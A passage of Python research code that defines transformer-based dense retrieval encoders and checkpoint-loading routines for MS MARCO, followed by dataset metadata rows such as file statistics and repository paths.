full_emb = self.masked_mean_or_first(outputs1, attention_mask)
#print('???',full_emb.shape)
query1 = self.norm(self.embeddingHead(full_emb))
return query1
def body_emb(self, input_ids, attention_mask):
return self.query_emb(input_ids, attention_mask)
class ERNIE2Dot_NLL_LN(NLL,BertForSequenceClassification):
"""None
Compress embedding to 200d, then computes NLL loss.
"""
def __init__(self, config, model_argobj=None):
NLL.__init__(self, model_argobj)
BertForSequenceClassification.__init__(self, config)
self.embeddingHead = nn.Linear(768, 768)
self.norm = nn.LayerNorm(768)
self.apply(self._init_weights)
# for name, param in self.named_parameters():
# print(name,param.requires_grad)
#RobertaForSequenceClassification.__init__(self, config)
# self.tokenizer = AutoTokenizer.from_pretrained("nghuyong/ernie-2.0-en")
# self.model = AutoModel.from_pretrained("nghuyong/ernie-2.0-en")
def query_emb(self, input_ids, attention_mask):
outputs1 = self.bert(input_ids=input_ids,
attention_mask=attention_mask)
full_emb = self.masked_mean_or_first(outputs1, attention_mask)
query1 = self.norm(self.embeddingHead(full_emb))
return query1
def body_emb(self, input_ids, attention_mask):
return self.query_emb(input_ids, attention_mask)
class RobertaDot_NLL_LN_fairseq(NLL,nn.Module):
"""None
Compress embedding to 200d, then computes NLL loss.
"""
def __init__(self, config, model_argobj=None):
nn.Module.__init__(self)
NLL.__init__(self, model_argobj)
self.encoder=TransformerSentenceEncoder(
padding_idx=1,
vocab_size=50265,
num_encoder_layers=12,
embedding_dim=768,
ffn_embedding_dim=3072,
num_attention_heads=12,
dropout=0.1,
attention_dropout=0.1,
activation_dropout=0.0,
layerdrop=0.0,
max_seq_len=512,
num_segments=0,
encoder_normalize_before=True,
apply_bert_init=True,
activation_fn="gelu",
q_noise=0.0,
qn_block_size=8,
)
self.embeddingHead = nn.Linear(config.hidden_size, 768)
self.norm = nn.LayerNorm(768)
self.apply(self._init_weights)
def query_emb(self, input_ids, attention_mask):
#print('???input_ids',input_ids.shape)
outputs1, _ = self.encoder(input_ids)#[-1].transpose(0,1)
#print('???',outputs1)
outputs1=outputs1[-1].transpose(0,1)
full_emb = self.masked_mean_or_first(outputs1, attention_mask)
query1 = self.norm(self.embeddingHead(full_emb))
return query1
def body_emb(self, input_ids, attention_mask):
return self.query_emb(input_ids, attention_mask)
def from_pretrained(self, model_path):
model_dict = self.state_dict()
save_model=torch.load(model_path, map_location=lambda storage, loc: storage)
#print(save_model['model'].keys())
pretrained_dict= {}
if 'model' in save_model.keys():
#save_model['model']
for name in save_model['model']:
if 'lm_head' not in name and 'decode' not in name:
pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
assert len(model_dict)-4==len(pretrained_dict)
else:
for name in save_model:
pretrained_dict[name[7:]]=save_model[name]
assert len(model_dict)==len(pretrained_dict)
#print(model_dict.keys())
print('load model.... ',len(model_dict),len(pretrained_dict))
print(pretrained_dict.keys())
model_dict.update(pretrained_dict)
self.load_state_dict(model_dict)
class RobertaDot_NLL_LN_fairseq_fast_sentence(NLL,nn.Module):
"""None
Compress embedding to 200d, then computes NLL loss.
"""
def __init__(self, config, model_argobj=None):
nn.Module.__init__(self)
NLL.__init__(self, model_argobj)
self.encoder=TransformerSentenceEncoder(
padding_idx=1,
vocab_size=32769,
num_encoder_layers=12,
embedding_dim=768,
ffn_embedding_dim=3072,
num_attention_heads=12,
dropout=0.1,
attention_dropout=0.1,
activation_dropout=0.0,
layerdrop=0.0,
max_seq_len=512,
num_segments=0,
encoder_normalize_before=True,
apply_bert_init=True,
activation_fn="gelu",
q_noise=0.0,
qn_block_size=8,
)
self.embeddingHead = nn.Linear(config.hidden_size, 768)
self.norm = nn.LayerNorm(768)
self.apply(self._init_weights)
def query_emb(self, input_ids, attention_mask):
#print('???input_ids',input_ids.shape)
outputs1, _ = self.encoder(input_ids)#[-1].transpose(0,1)
#print('???',outputs1)
outputs1=outputs1[-1].transpose(0,1)
full_emb = self.masked_mean_or_first(outputs1, attention_mask)
query1 = self.norm(self.embeddingHead(full_emb))
return query1
def body_emb(self, input_ids, attention_mask):
return self.query_emb(input_ids, attention_mask)
#tikenid pad
def from_pretrained(self, model_path):
model_dict = self.state_dict()
save_model=torch.load(model_path, map_location=lambda storage, loc: storage)
#print(save_model['model'].keys())
pretrained_dict= {}
# print('???model_dict',model_dict.keys(),len(model_dict.keys()))
# print('???save_model',save_model['model'].keys(),len(save_model['model'].keys()))
if 'model' in save_model.keys():
#save_model['model']
for name in save_model['model']:
if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
# if 'lm_head' not in name and 'decode' not in name:
# if 'encoder' not in name:
# pretrained_dict[name]=save_model['model'][name]
# else:
# pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
# assert len(model_dict)-4==len(pretrained_dict)
# for item in pretrained_dict.keys():
# if item not in model_dict:
# print('???',item)
assert len(model_dict)-4==len(pretrained_dict), (len(model_dict),len(pretrained_dict),model_dict.keys(),pretrained_dict.keys())
else:
for name in save_model:
pretrained_dict[name[7:]]=save_model[name]
assert len(model_dict)==len(pretrained_dict)
#print(model_dict.keys())
print('load model.... ',len(model_dict),len(pretrained_dict))
print(pretrained_dict.keys())
model_dict.update(pretrained_dict)
self.load_state_dict(model_dict)
class RobertaDot_NLL_LN_fairseq_fast(NLL,nn.Module):
"""None
Compress embedding to 200d, then computes NLL loss.
"""
def __init__(self, config, model_argobj=None):
nn.Module.__init__(self)
NLL.__init__(self, model_argobj)
self.encoder=TransformerSentenceEncoder(
padding_idx=1,
vocab_size=32769,
num_encoder_layers=12,
embedding_dim=768,
ffn_embedding_dim=3072,
num_attention_heads=12,
dropout=0.1,
attention_dropout=0.1,
activation_dropout=0.0,
layerdrop=0.0,
max_seq_len=512,
num_segments=0,
encoder_normalize_before=True,
apply_bert_init=True,
activation_fn="gelu",
q_noise=0.0,
qn_block_size=8,
)
self.embeddingHead = nn.Linear(config.hidden_size, 768)
self.norm = nn.LayerNorm(768)
self.apply(self._init_weights)
def query_emb(self, input_ids, attention_mask):
#print('???input_ids',input_ids.shape)
outputs1, _ = self.encoder(input_ids)#[-1].transpose(0,1)
#print('???',outputs1)
outputs1=outputs1[-1].transpose(0,1)
if is_first_worker():
print(outputs1)
full_emb = self.masked_mean_or_first(outputs1, attention_mask)
query1 = self.norm(self.embeddingHead(full_emb))
# query_norm=torch.norm(query1,dim=1).unsqueeze(-1)
# query1=query1/query_norm
return query1
def body_emb(self, input_ids, attention_mask):
return self.query_emb(input_ids, attention_mask)
#tikenid pad
def from_pretrained(self, model_path):
model_dict = self.state_dict()
save_model=torch.load(model_path, map_location=lambda storage, loc: storage)
#print(save_model['model'].keys())
pretrained_dict= {}
# print('???model_dict',model_dict.keys(),len(model_dict.keys()))
# print('???save_model',save_model['model'].keys(),len(save_model['model'].keys()))
if 'model' in save_model.keys():
#save_model['model']
for name in save_model['model']:
if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
# if 'lm_head' not in name and 'decode' not in name:
# if 'encoder' not in name:
# pretrained_dict[name]=save_model['model'][name]
# else:
# pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
# assert len(model_dict)-4==len(pretrained_dict)
# for item in pretrained_dict.keys():
# if item not in model_dict:
# print('???',item)
assert len(model_dict)-4==len(pretrained_dict), (len(model_dict),len(pretrained_dict),model_dict.keys(),pretrained_dict.keys())
else:
print('load finetuned checkpoints...')
for name in save_model:
pretrained_dict[name[7:]]=save_model[name]
assert len(model_dict)==len(pretrained_dict)
#print(model_dict.keys())
print('load model.... ',len(model_dict),len(pretrained_dict))
print(pretrained_dict.keys())
model_dict.update(pretrained_dict)
self.load_state_dict(model_dict)
#pass
class RobertaDot_NLL_LN_fairseq_fast_zero(NLL,nn.Module):
"""None
Compress embedding to 200d, then computes NLL loss.
"""
def __init__(self, config, model_argobj=None):
nn.Module.__init__(self)
NLL.__init__(self, model_argobj)
self.encoder=TransformerSentenceEncoder(
padding_idx=1,
vocab_size=32769,
num_encoder_layers=12,
embedding_dim=768,
ffn_embedding_dim=3072,
num_attention_heads=12,
dropout=0.1,
attention_dropout=0.1,
activation_dropout=0.0,
layerdrop=0.0,
max_seq_len=512,
num_segments=0,
encoder_normalize_before=True,
apply_bert_init=True,
activation_fn="gelu",
q_noise=0.0,
qn_block_size=8,
)
self.embeddingHead = nn.Linear(config.hidden_size, 768)
self.norm = nn.LayerNorm(768)
self.apply(self._init_weights)
for name, param in self.named_parameters():
if name.startswith('encode'):
print('fix: ',name)
param.requires_grad=False
def query_emb(self, input_ids, attention_mask):
#print('???input_ids',input_ids.shape)
outputs1, _ = self.encoder(input_ids)#[-1].transpose(0,1)
#print('???',outputs1)
outputs1=outputs1[-1].transpose(0,1)
full_emb = self.masked_mean_or_first(outputs1, attention_mask)
query1 = self.norm(self.embeddingHead(full_emb))
# query_norm=torch.norm(full_emb,dim=1).unsqueeze(-1)
# query1=full_emb/query_norm
return query1
def body_emb(self, input_ids, attention_mask):
return self.query_emb(input_ids, attention_mask)
#tikenid pad
def from_pretrained(self, model_path):
model_dict = self.state_dict()
save_model=torch.load(model_path, map_location=lambda storage, loc: storage)
#print(save_model['model'].keys())
pretrained_dict= {}
# print('???model_dict',model_dict.keys(),len(model_dict.keys()))
# print('???save_model',save_model['model'].keys(),len(save_model['model'].keys()))
if 'model' in save_model.keys():
#save_model['model']
for name in save_model['model']:
if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
# if 'lm_head' not in name and 'decode' not in name:
# if 'encoder' not in name:
# pretrained_dict[name]=save_model['model'][name]
# else:
# pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
# assert len(model_dict)-4==len(pretrained_dict)
# for item in pretrained_dict.keys():
# if item not in model_dict:
# print('???',item)
assert len(model_dict)-4==len(pretrained_dict), (len(model_dict),len(pretrained_dict),model_dict,pretrained_dict)
#assert len(model_dict)==len(pretrained_dict)
else:
for name in save_model:
pretrained_dict[name[7:]]=save_model[name]
assert len(model_dict)==len(pretrained_dict)
#print(model_dict.keys())
print('load model.... ',len(model_dict),len(pretrained_dict))
print(pretrained_dict.keys())
model_dict.update(pretrained_dict)
self.load_state_dict(model_dict)
class RobertaDot_NLL_LN_fairseq_fast_3layer(NLL,nn.Module):
"""None
Compress embedding to 200d, then computes NLL loss.
"""
def __init__(self, config, model_argobj=None):
nn.Module.__init__(self)
NLL.__init__(self, model_argobj)
self.encoder=TransformerSentenceEncoder(
padding_idx=1,
vocab_size=32769,
num_encoder_layers=3,
embedding_dim=768,
ffn_embedding_dim=3072,
num_attention_heads=12,
dropout=0.1,
attention_dropout=0.1,
activation_dropout=0.0,
layerdrop=0.0,
max_seq_len=512,
num_segments=0,
encoder_normalize_before=True,
apply_bert_init=True,
activation_fn="gelu",
q_noise=0.0,
qn_block_size=8,
)
self.embeddingHead = nn.Linear(config.hidden_size, 768)
self.norm = nn.LayerNorm(768)
self.apply(self._init_weights)
def query_emb(self, input_ids, attention_mask):
#print('???input_ids',input_ids.shape)
outputs1, _ = self.encoder(input_ids)#[-1].transpose(0,1)
#print('???',outputs1)
outputs1=outputs1[-1].transpose(0,1)
full_emb = self.masked_mean_or_first(outputs1, attention_mask)
query1 = self.norm(self.embeddingHead(full_emb))
return query1
def body_emb(self, input_ids, attention_mask):
return self.query_emb(input_ids, attention_mask)
#tikenid pad
def from_pretrained(self, model_path):
model_dict = self.state_dict()
save_model=torch.load(model_path, map_location=lambda storage, loc: storage)
#print(save_model['model'].keys())
pretrained_dict= {}
# print('???model_dict',model_dict.keys(),len(model_dict.keys()))
# print('???save_model',save_model['model'].keys(),len(save_model['model'].keys()))
if 'model' in save_model.keys():
#save_model['model']
for name in save_model['model']:
if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
flag=0
for layer_i in range(3,12):
if 'layers.'+str(layer_i) in name:
flag=1
break
if flag ==0:
pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
# if 'lm_head' not in name and 'decode' not in name:
# if 'encoder' not in name:
# pretrained_dict[name]=save_model['model'][name]
# else:
# pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
# assert len(model_dict)-4==len(pretrained_dict)
# for item in pretrained_dict.keys():
# if item not in model_dict:
# print('???',item)
assert len(model_dict)-4==len(pretrained_dict), (len(model_dict),len(pretrained_dict),model_dict,pretrained_dict)
else:
for name in save_model:
pretrained_dict[name[7:]]=save_model[name]
assert len(model_dict)==len(pretrained_dict)
#print(model_dict.keys())
print('load model.... ',len(model_dict),len(pretrained_dict))
print(pretrained_dict.keys())
model_dict.update(pretrained_dict)
self.load_state_dict(model_dict)
class RobertaDot_NLL_LN_fairseq_fast2(NLL,nn.Module):
"""None
Compress embedding to 200d, then computes NLL loss.
"""
def __init__(self, config, model_argobj=None):
nn.Module.__init__(self)
NLL.__init__(self, model_argobj)
self.encoder=TransformerSentenceEncoder(
padding_idx=1,
vocab_size=32769,
num_encoder_layers=6,
embedding_dim=768,
ffn_embedding_dim=3072,
num_attention_heads=12,
dropout=0.1,
attention_dropout=0.1,
activation_dropout=0.0,
layerdrop=0.0,
max_seq_len=512,
num_segments=0,
encoder_normalize_before=True,
apply_bert_init=True,
activation_fn="gelu",
q_noise=0.0,
qn_block_size=8,
)
self.embeddingHead = nn.Linear(config.hidden_size, 768)
self.norm = nn.LayerNorm(768)
self.apply(self._init_weights)
def query_emb(self, input_ids, attention_mask):
#print('???input_ids',input_ids.shape)
outputs1, _ = self.encoder(input_ids)#[-1].transpose(0,1)
#print('???',outputs1)
outputs1=outputs1[-1].transpose(0,1)
full_emb = self.masked_mean_or_first(outputs1, attention_mask)
query1 = self.norm(self.embeddingHead(full_emb))
return query1
def body_emb(self, input_ids, attention_mask):
return self.query_emb(input_ids, attention_mask)
#tikenid pad
def from_pretrained(self, model_path):
model_dict = self.state_dict()
save_model=torch.load(model_path, map_location=lambda storage, loc: storage)
#print(save_model['model'].keys())
pretrained_dict= {}
# print('???model_dict',model_dict.keys(),len(model_dict.keys()))
# print('???save_model',save_model['model'].keys(),len(save_model['model'].keys()))
if 'model' in save_model.keys():
#save_model['model']
for name in save_model['model']:
if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
# if 'lm_head' not in name and 'decode' not in name:
# if 'encoder' not in name:
# pretrained_dict[name]=save_model['model'][name]
# else:
# pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
# assert len(model_dict)-4==len(pretrained_dict)
# for item in pretrained_dict.keys():
# if item not in model_dict:
# print('???',item)
assert len(model_dict)-4==len(pretrained_dict), (len(model_dict),len(pretrained_dict),model_dict,pretrained_dict)
else:
for name in save_model:
pretrained_dict[name[7:]]=save_model[name]
assert len(model_dict)==len(pretrained_dict)
#print(model_dict.keys())
print('load model.... ',len(model_dict),len(pretrained_dict))
print(pretrained_dict.keys())
model_dict.update(pretrained_dict)
self.load_state_dict(model_dict)
#pass
class RobertaDot_CLF_ANN_NLL_MultiChunk(NLL_MultiChunk, RobertaDot_NLL_LN):
def __init__(self, config):
RobertaDot_NLL_LN.__init__(self, config)
self.base_len = 512
def body_emb(self, input_ids, attention_mask):
[batchS, full_length] = input_ids.size()
chunk_factor = full_length // self.base_len
input_seq = input_ids.reshape(
batchS,
chunk_factor,
full_length //
chunk_factor).reshape(
batchS *
chunk_factor,
full_length //
chunk_factor)
attention_mask_seq = attention_mask.reshape(
batchS,
chunk_factor,
full_length //
chunk_factor).reshape(
batchS *
chunk_factor,
full_length //
chunk_factor)
#print('???',input_seq)
outputs_k = self.roberta(input_ids=input_seq,
attention_mask=attention_mask_seq)
#print('???',outputs_k)
compressed_output_k = self.embeddingHead(
outputs_k[0]) # [batch, len, dim]
compressed_output_k = self.norm(compressed_output_k[:, 0, :])
[batch_expand, embeddingS] = compressed_output_k.size()
complex_emb_k = compressed_output_k.reshape(
batchS, chunk_factor, embeddingS)
return complex_emb_k # size [batchS, chunk_factor, embeddingS]
class RobertaDot_CLF_ANN_NLL_MultiChunk_fairseq_fast(NLL_MultiChunk, RobertaDot_NLL_LN_fairseq_fast):
def __init__(self, config):
RobertaDot_NLL_LN_fairseq_fast.__init__(self, config)
self.base_len = 512
def body_emb(self, input_ids, attention_mask):
[batchS, full_length] = input_ids.size()
chunk_factor = full_length // self.base_len
input_seq = input_ids.reshape(
batchS,
chunk_factor,
full_length //
chunk_factor).reshape(
batchS *
chunk_factor,
full_length //
chunk_factor)
# attention_mask_seq = attention_mask.reshape(
# batchS,
# chunk_factor,
# full_length //
# chunk_factor).reshape(
# batchS *
# chunk_factor,
# full_length //
# chunk_factor)
# outputs_k = self.roberta(input_ids=input_seq,
# attention_mask=attention_mask_seq)
#print('???',input_seq)
outputs_k, _= self.encoder(input_seq)
outputs_k=outputs_k[-1].transpose(0,1)
#print('???',outputs_k)#这里要想一想怎么调,要不把enoder里面的*0去掉
compressed_output_k = self.embeddingHead(
outputs_k) # [batch, len, dim]
compressed_output_k = self.norm(compressed_output_k[:, 0, :])
[batch_expand, embeddingS] = compressed_output_k.size()
complex_emb_k = compressed_output_k.reshape(
batchS, chunk_factor, embeddingS)
return complex_emb_k # size [batchS, chunk_factor, embeddingS]
# def from_pretrained(self, model_path):
# model_dict = self.state_dict()
# save_model=torch.load(model_path, map_location=lambda storage, loc: storage)
# #print(save_model['model'].keys())
# pretrained_dict= {}
# # print('???model_dict',model_dict.keys(),len(model_dict.keys()))
# # print('???save_model',save_model['model'].keys(),len(save_model['model'].keys()))
# if 'model' in save_model.keys():
# #save_model['model']
# for name in save_model['model']:
# if 'lm_head' not in name and 'encoder' in name:
# pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
# # if 'lm_head' not in name and 'decode' not in name:
# # if 'encoder' not in name:
# # pretrained_dict[name]=save_model['model'][name]
# # else:
# # pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
# # assert len(model_dict)-4==len(pretrained_dict)
# # for item in pretrained_dict.keys():
# # if item not in model_dict:
# # print('???',item)
# assert len(model_dict)-4==len(pretrained_dict), (len(model_dict),len(pretrained_dict))
# else:
# for name in save_model:
# pretrained_dict[name[7:]]=save_model[name]
# assert len(model_dict)==len(pretrained_dict)
# #print(model_dict.keys())
# print('load model.... ',len(model_dict),len(pretrained_dict))
# print(pretrained_dict.keys())
# model_dict.update(pretrained_dict)
# self.load_state_dict(model_dict)
class HFBertEncoder(BertModel):
def __init__(self, config):
BertModel.__init__(self, config)
assert config.hidden_size > 0, 'Encoder hidden_size can\'t be zero'
self.init_weights()
@classmethod
def init_encoder(cls, args, dropout: float = 0.1):
cfg = BertConfig.from_pretrained("bert-base-uncased")
if dropout != 0:
cfg.attention_probs_dropout_prob = dropout
cfg.hidden_dropout_prob = dropout
return cls.from_pretrained("bert-base-uncased", config=cfg)
def forward(self, input_ids, attention_mask):
hidden_states = None
sequence_output, pooled_output = super().forward(input_ids=input_ids,
attention_mask=attention_mask)
pooled_output = sequence_output[:, 0, :]
return sequence_output, pooled_output, hidden_states
def get_out_size(self):
if self.encode_proj:
return self.encode_proj.out_features
return self.config.hidden_size
class BiEncoder(nn.Module):
""" Bi-Encoder model component. Encapsulates query/question and context/passage encoders.
"""
def __init__(self, args):
super(BiEncoder, self).__init__()
self.question_model = HFBertEncoder.init_encoder(args)
self.ctx_model = HFBertEncoder.init_encoder(args)
def query_emb(self, input_ids, attention_mask):
sequence_output, pooled_output, hidden_states = self.question_model(input_ids, attention_mask)
return pooled_output
def body_emb(self, input_ids, attention_mask):
sequence_output, pooled_output, hidden_states = self.ctx_model(input_ids, attention_mask)
return pooled_output
def forward(self, query_ids, attention_mask_q, input_ids_a = None, attention_mask_a = None, input_ids_b = None, attention_mask_b = None):
if input_ids_b is None:
q_embs = self.query_emb(query_ids, attention_mask_q)
a_embs = self.body_emb(input_ids_a, attention_mask_a)
return (q_embs, a_embs)
q_embs = self.query_emb(query_ids, attention_mask_q)
a_embs = self.body_emb(input_ids_a, attention_mask_a)
b_embs = self.body_emb(input_ids_b, attention_mask_b)
logit_matrix = torch.cat([(q_embs*a_embs).sum(-1).unsqueeze(1), (q_embs*b_embs).sum(-1).unsqueeze(1)], dim=1) #[B, 2]
lsm = F.log_softmax(logit_matrix, dim=1)
loss = -1.0*lsm[:,0]
return (loss.mean(),)
class RobertaEncoderFast(nn.Module):
def __init__(self,dropout: float = 0.1):
super(RobertaEncoderFast, self).__init__()
self.fairseq_roberta = TransformerSentenceEncoder(
padding_idx=1,
vocab_size=32769,
num_encoder_layers=12,
embedding_dim=768,
ffn_embedding_dim=3072,
num_attention_heads=12,
dropout=0.1,
attention_dropout=0.1,
activation_dropout=0.0,
layerdrop=0.0,
max_seq_len=512,
num_segments=0,
encoder_normalize_before=True,
apply_bert_init=True,
activation_fn="gelu",
q_noise=0.0,
qn_block_size=8,
)
# self.encode_proj = (
# nn.Linear(config.hidden_size, project_dim) if project_dim != 0 else None
# )
# if dropout != 0:
# self.fairseq_roberta.encoder.sentence_encoder=dropout
from fairseq.modules.transformer_sentence_encoder import init_bert_params
self.apply(init_bert_params)
# self.init_weights()
#@classmethod
def from_pretrained(self, model_path: str):
model_dict = self.state_dict()
save_model=torch.load(model_path, map_location=lambda storage, loc: storage)
pretrained_dict= {}
if 'model' in save_model.keys():
for name in save_model['model']:
if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
pretrained_dict['fairseq_roberta'+name[24:]]=save_model['model'][name]
if not self.encode_proj:
assert len(model_dict)==len(pretrained_dict), (len(model_dict),len(pretrained_dict),model_dict.keys(),pretrained_dict.keys())
else:
print('load finetuned checkpoints...')
for name in save_model:
pretrained_dict[name[7:]]=save_model[name]
assert len(model_dict)==len(pretrained_dict)
print('load model.... ',len(model_dict),len(pretrained_dict))
print(pretrained_dict.keys())
model_dict.update(pretrained_dict)
self.load_state_dict(model_dict)
def forward(self, input_ids, attention_mask=None,representation_token_pos=0) -> Tuple[T, ...]:
roberta_out,_=self.fairseq_roberta(input_ids)
roberta_out=roberta_out[-1].transpose(0,1)
if isinstance(representation_token_pos, int):
cls_out = roberta_out[:, representation_token_pos, :]
else: # treat as a tensor
bsz = roberta_out.size(0)
assert (
representation_token_pos.size(0) == bsz
), "query bsz={} while representation_token_pos bsz={}".format(
bsz, representation_token_pos.size(0)
)
cls_out = torch.stack(
[
roberta_out[i, representation_token_pos[i, 1], :]
for i in range(bsz)
]
)
return roberta_out, cls_out, None
def get_out_size(self):
if self.encode_proj:
return self.encode_proj.out_features
#return self.config.hidden_size
return 768
class BiEncoderFast(nn.Module):
""" Bi-Encoder model component. Encapsulates query/question and context/passage encoders.
"""
def __init__(self, args):
super(BiEncoderFast, self).__init__()
self.question_model = RobertaEncoderFast()
self.ctx_model = RobertaEncoderFast()
# save_model=torch.load(args.model_path, map_location=lambda storage, loc: storage)
# self.load_state_dict(save_model)
def query_emb(self, input_ids, attention_mask=None):
#print('input_ids: ',input_ids)
sequence_output, pooled_output, hidden_states = self.question_model(input_ids)
return pooled_output
def body_emb(self, input_ids, attention_mask=None):
sequence_output, pooled_output, hidden_states = self.ctx_model(input_ids)
return pooled_output
def forward(self, query_ids, attention_mask_q=None, input_ids_a = None, attention_mask_a = None, input_ids_b = None, attention_mask_b = None):
if input_ids_b is None:
q_embs = self.query_emb(query_ids, attention_mask_q)
a_embs = self.body_emb(input_ids_a, attention_mask_a)
return (q_embs, a_embs)
q_embs = self.query_emb(query_ids, attention_mask_q)
a_embs = self.body_emb(input_ids_a, attention_mask_a)
b_embs = self.body_emb(input_ids_b, attention_mask_b)
logit_matrix = torch.cat([(q_embs*a_embs).sum(-1).unsqueeze(1), (q_embs*b_embs).sum(-1).unsqueeze(1)], dim=1) #[B, 2]
lsm = F.log_softmax(logit_matrix, dim=1)
loss = -1.0*lsm[:,0]
return (loss.mean(),)
# --------------------------------------------------
ALL_MODELS = sum(
(
tuple(conf.pretrained_config_archive_map.keys())
for conf in (
RobertaConfig,
) if hasattr(conf,'pretrained_config_archive_map')
),
(),
)
default_process_fn = triple_process_fn
class MSMarcoConfig:
def __init__(self, name, model, process_fn=default_process_fn, use_mean=True, tokenizer_class=RobertaTokenizer, config_class=RobertaConfig):
self.name = name
self.process_fn = process_fn
self.model_class = model
self.use_mean = use_mean
self.tokenizer_class = tokenizer_class
self.config_class = config_class
configs = [
MSMarcoConfig(name="rdot_nll",
model=RobertaDot_NLL_LN,
use_mean=False,
),
MSMarcoConfig(name="rdot_nll_multi_chunk",
model=RobertaDot_CLF_ANN_NLL_MultiChunk,
use_mean=False,
),
MSMarcoConfig(name="dpr",
model=BiEncoder,
tokenizer_class=BertTokenizer,
config_class=BertConfig,
use_mean=False,
),
MSMarcoConfig(name="dpr_fast",
model=BiEncoderFast,
# tokenizer_class=BertTokenizer,
# config_class=BertConfig,
use_mean=False,
),
MSMarcoConfig(name="ELECTRA_Dot_NLL_LN",
model=ELECTRA_Dot_NLL_LN,
tokenizer_class=ElectraTokenizer,
config_class=ElectraConfig,
use_mean=False,
),
# MSMarcoConfig(name="ERNIE2Dot_NLL_LN",
# model=ERNIE2Dot_NLL_LN,
# use_mean=False,
# ),
MSMarcoConfig(name="ERNIE2Dot_NLL_LN",
model=ERNIE2Dot_NLL_LN,
tokenizer_class=BertTokenizer,
config_class=BertConfig,
use_mean=False,
),
MSMarcoConfig(name="rdot_nll_fairseq",
model=RobertaDot_NLL_LN_fairseq,
use_mean=False,
#config_class=,
),
MSMarcoConfig(name="rdot_nll_fairseq_fast",
model=RobertaDot_NLL_LN_fairseq_fast,
use_mean=False,
#config_class=,
),
MSMarcoConfig(name="rdot_nll_fairseq_fast_sentence",
model=RobertaDot_NLL_LN_fairseq_fast_sentence,
use_mean=False,
#config_class=,
),
MSMarcoConfig(name="rdot_nll_fairseq_fast_3layer",
model=RobertaDot_NLL_LN_fairseq_fast_3layer,
use_mean=False,
#config_class=,
),
MSMarcoConfig(name="rdot_nll_fairseq_fast2",
model=RobertaDot_NLL_LN_fairseq_fast2,
use_mean=False,
#config_class=,
),
MSMarcoConfig(name="rdot_nll_fairseq_fast_zero",
model=RobertaDot_NLL_LN_fairseq_fast_zero,
use_mean=False,
#config_class=,
),
MSMarcoConfig(name="rdot_nll_fairseq_fast_concat",
model=RobertaDot_NLL_LN_fairseq_fast_concat,
use_mean=False,
#config_class=,
),
MSMarcoConfig(name="rdot_nll_multi_chunk_fairseq_fast",
model=RobertaDot_CLF_ANN_NLL_MultiChunk_fairseq_fast,
use_mean=False,
),
]
MSMarcoConfigDict = {cfg.name: cfg for cfg in configs}
| 41.10815
| 147
| 0.581062
| 6,148
| 52,454
| 4.646552
| 0.057417
| 0.052788
| 0.035846
| 0.033815
| 0.849547
| 0.822347
| 0.798404
| 0.769629
| 0.758638
| 0.750201
| 0
| 0.019615
| 0.308956
| 52,454
| 1,275
| 148
| 41.140392
| 0.768484
| 0.215179
| 0
| 0.718259
| 0
| 0.007255
| 0.02661
| 0.006113
| 0
| 0
| 0
| 0
| 0.021765
| 1
| 0.082225
| false
| 0
| 0.015719
| 0.013301
| 0.183797
| 0.025393
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
34052907947a5431f48239e16ec45820a06bc441
| 65
|
py
|
Python
|
src/lib/models/networks/config/__init__.py
|
MLDSAI/FairMOT
|
728ce0f51bf168b18b8737e0b4ba4b080f7722d0
|
[
"MIT"
] | 3,473
|
2020-04-04T08:04:33.000Z
|
2022-03-31T14:52:11.000Z
|
src/lib/models/networks/config/__init__.py
|
MLDSAI/FairMOT
|
728ce0f51bf168b18b8737e0b4ba4b080f7722d0
|
[
"MIT"
] | 472
|
2020-04-07T15:33:15.000Z
|
2022-03-31T02:31:10.000Z
|
src/lib/models/networks/config/__init__.py
|
MLDSAI/FairMOT
|
728ce0f51bf168b18b8737e0b4ba4b080f7722d0
|
[
"MIT"
] | 914
|
2020-04-08T00:37:45.000Z
|
2022-03-31T08:43:39.000Z
|
from .default import _C as cfg
from .default import update_config
| 32.5
| 34
| 0.830769
| 11
| 65
| 4.727273
| 0.727273
| 0.423077
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138462
| 65
| 2
| 34
| 32.5
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
34075218c5330edc658d287d76afddd921c59763
| 49,431
|
py
|
Python
|
module/auto_reaction.py
|
cyberlimit/DarkWEB
|
ce3d6cd9b052c3e9a19a90e5ed6a1ec802f98f85
|
[
"Apache-2.0"
] | 199
|
2018-06-21T22:23:28.000Z
|
2022-03-14T09:55:12.000Z
|
module/auto_reaction.py
|
cyberlimit/DarkWEB
|
ce3d6cd9b052c3e9a19a90e5ed6a1ec802f98f85
|
[
"Apache-2.0"
] | 6
|
2018-07-28T02:54:47.000Z
|
2021-12-01T19:35:31.000Z
|
module/auto_reaction.py
|
cyberlimit/DarkWEB
|
ce3d6cd9b052c3e9a19a90e5ed6a1ec802f98f85
|
[
